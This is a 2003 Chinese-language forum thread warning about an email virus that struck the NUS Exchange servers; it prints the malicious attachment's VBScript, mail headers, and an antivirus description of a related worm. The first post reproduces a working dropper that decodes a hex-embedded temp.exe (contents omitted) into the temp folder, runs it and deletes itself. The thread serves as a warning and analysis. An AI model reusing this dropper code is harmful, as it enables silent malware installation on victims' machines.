Email Virus attacked NUS exchange server......
登录 | 论坛导航 -> 华新鲜事 -> 社会百科 | 本帖共有 4 楼,分 1 页, 当前显示第 1 页 : 本帖树形列表 : 刷新 : 返回上一页
<<始页  [1]  末页>>
作者:有话想说 (等级:6 - 驾轻就熟,发帖:16666) 发表:2003-04-28 22:43:02  楼主  关注此帖评分:
[登录后回复]
Email Virus attacked NUS exchange server......
the email contains such a html attachemtn

Please wait...
<script language='vbscript'>
on error resume next
set a=createobject("wscript.shell")
set b=createobject("scripting.filesystemobject")
co=0
if (err.number<>0) then
co=1
window.open(document.location.pathname)
end if
set c=b.getspecialfolder(2)
d=replace(document.location.pathname,"%20"," ")
e=c &"\temp.exe"
<此处略过若干千字节,为temp.exe文件内容>
set f=b.createtextfile(e,true)
f.write h(g)
f.close
a.run e,false
window.settimeout "b.deletefile d,true",500
window.settimeout "window.close",500
function h(st)
for i=1 to len(st) step 2
h=h & chr("&h"&mid(st,i,2))
next
end function </script><html>Tinh` cho khong bieu' khong</html>
欢迎来到华新中文网,踊跃发帖是支持我们的最好方法!原文 / 传统版 / WAP版所有回复从这里展开收起列表
作者:有话想说 (等级:6 - 驾轻就熟,发帖:16666) 发表:2003-04-28 22:57:33  2楼 评分:
[登录后回复]
在 有话想说 的大作中提到:
Email Virus attacked NUS exchange server......the email contains such a html attachemtn Please wait... on error resume next set a=createobject("wscript.shell") set b=createobject("scripting.filesystemobject") co=0 if (err.number0) then co=1 window.open(document.location.pathname) end if set c=b.getspecialfolder(2) d=replace(document.location.pathname,"%20"," ") e=c &"\temp.exe" set f=b.createtextfile(e,true) f.write h(g) f.close a.run e,false window.settimeout "b.deletefile d,true",500 window.settimeout "window.close",500 function h(st) for i=1 to len(st) step 2 h=h & chr("&h"&mid(st,i,2)) next end function Tinh` cho khong bieu' khong
mail header
Received: from mbxsrv26.stu.nus.edu.sg ([137.132.14.225]) by mbxsrv25.stu.nus.edu.sg with Microsoft SMTPSVC(5.0.2195.5329);
Mon, 28 Apr 2003 22:38:34 +0800
Received: from ims01.stf.nus.edu.sg ([137.132.14.208]) by mbxsrv26.stu.nus.edu.sg with Microsoft SMTPSVC(5.0.2195.5329);
Mon, 28 Apr 2003 22:34:40 +0800
Received: from isv01.stf.nus.edu.sg ([137.132.14.19]) by ims01.stf.nus.edu.sg with Microsoft SMTPSVC(5.0.2195.5329);
Mon, 28 Apr 2003 22:30:04 +0800
Received: from leonis.nus.edu.sg ([137.132.1.18]) by isv01.stf.nus.edu.sg with InterScan Messaging Security Suite for SMTP; Mon, 28 Apr 2003 22:30:02 +0800
Received: from jx (209-120.priv19.nus.edu.sg [172.19.209.120])
by leonis.nus.edu.sg (8.12.9/8.12.9) with SMTP id h3SEVO2s010648
for <NUSStudents@nus.edu.sg>; Mon, 28 Apr 2003 22:31:25 +0800 (SGT)
Date: Mon, 28 Apr 2003 22:31:24 +0800 (SGT)
Message-Id: <200304281431.h3SEVO2s010648@leonis.nus.edu.sg>
From: "uprbox1"<uprbox1@nus.edu.sg>
To: NUSStudents@nus.edu.sg
Subject: HELP??-
Reply-To: uprbox1@nus.edu.sg
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"
Return-Path: uprbox1@nus.edu.sg
X-OriginalArrivalTime: 28 Apr 2003 14:30:04.0445 (UTC) FILETIME=[A8C624D0:01C30D92]

欢迎来到华新中文网,踊跃发帖是支持我们的最好方法!原文 / 传统版 / WAP版所有回复从这里展开收起列表
作者:有话想说 (等级:6 - 驾轻就熟,发帖:16666) 发表:2003-04-28 23:21:07  3楼 评分:
[登录后回复]
在 小男孩 的大作中提到:
该病毒介绍>>>>>该病毒是下面病毒的变种 ------------------------ 病毒名称 VBS/VBSWG.X.Worm 别名 病毒类型 蠕虫 特点 VBS/VBSWG.X.Worm是一个通过邮件传播的蠕虫病毒,它可以向地址薄中所有人发送染毒邮件,并打开包含有色情内容的网站。 病毒介绍 染毒邮件主题为:"Homepage" 邮件内容为:"Hi!        You've got to see this page! It's really cool ;O)" 邮件附件是蠕虫本身:"HOMEPAGE.HTML.VBS"   当附件被运行后,蠕虫病毒被激活,并按照地址簿中所有地址发送带毒邮件。 病毒将自身拷贝到系统Temp目录下,同时修改注册表: HKEY_CURRENT_USER\Software\An\mailed 并将键值至为1。   之后,蠕虫会搜索邮箱中主题为"Homepage"的邮件,将其删除。 解决方法 Kill 23.44以上版本可以检测VBS/VBSWG.X.Worm 所有被检测到感染有VBS/VBSWG.X.Worm蠕虫的文件必须被删除,这可以通过手工方式或设置kill直接删除这些文件。
it is not this one..... definately......
It is a new virus, mainly harm is to attack the MS exchange servers, and pay load onto it..... (from current observations)

the virus has been submitted it to SARC(symantec antivirus research center) just now......

欢迎来到华新中文网,踊跃发帖是支持我们的最好方法!原文 / 传统版 / WAP版所有回复从这里展开收起列表
作者:有话想说 (等级:6 - 驾轻就熟,发帖:16666) 发表:2003-04-28 23:21:56  4楼
[登录后回复]
在 Rookkie 的大作中提到:
Any Harm?mailbox bomber?
seems a exchange server virus.....
欢迎来到华新中文网,踊跃发帖是支持我们的最好方法!原文 / 传统版 / WAP版所有回复从这里展开收起列表
论坛导航 -> 华新鲜事 -> 社会百科 | 返回上一页 | 本主题共有 4 篇文章,分 1 页, 当前显示第 1 页 | 回到顶部
<<始页  [1]  末页>>

请登录后回复:帐号   密码